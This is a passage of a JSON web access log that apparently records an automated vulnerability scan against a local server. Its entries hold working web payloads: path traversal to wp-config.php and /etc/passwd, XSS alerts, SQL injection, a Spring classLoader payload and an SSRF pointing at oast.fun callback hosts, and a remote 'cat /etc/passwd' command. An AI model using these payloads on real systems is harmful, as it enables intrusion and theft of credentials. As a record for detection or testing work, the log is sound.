+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/firewall.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ck/domenu.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CGI/Java/Serviceability?adapter=device.statistics.configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=dff1db99c9ecc3c645a4239e20e8ba32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground-html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://ca2u0eosmpv1jhs80ca0tjedn13p6ki9z.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/37 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/lesson/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmodule-ee/login.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jh-404-logger/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/projectCategory?maxResults=1000 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.production.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/38 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x22O_\x22: \x22A\x22, \x22F_\x22: \x22EXEC_CMD\x22, \x22S_\x22: 123456789, \x22P1_\x22: {\x22Q\x22: \x22cat /etc/passwd\x22, \x22F\x22: \x22EXEC_CMD\x22}, \x22V_\x22: 1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/libagent.cgi?type=J HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.svn/entries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy.stream?origin=http://ca2u0eosmpv1jhs80ca0k6yx97f9mamg5.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"action=health-check-view-file-diff&file=../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hopfully404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/39 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/printenv.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:34 +0000","request_body":"module=relogin&action=login&pass=nope&user=a' UNION SELECT 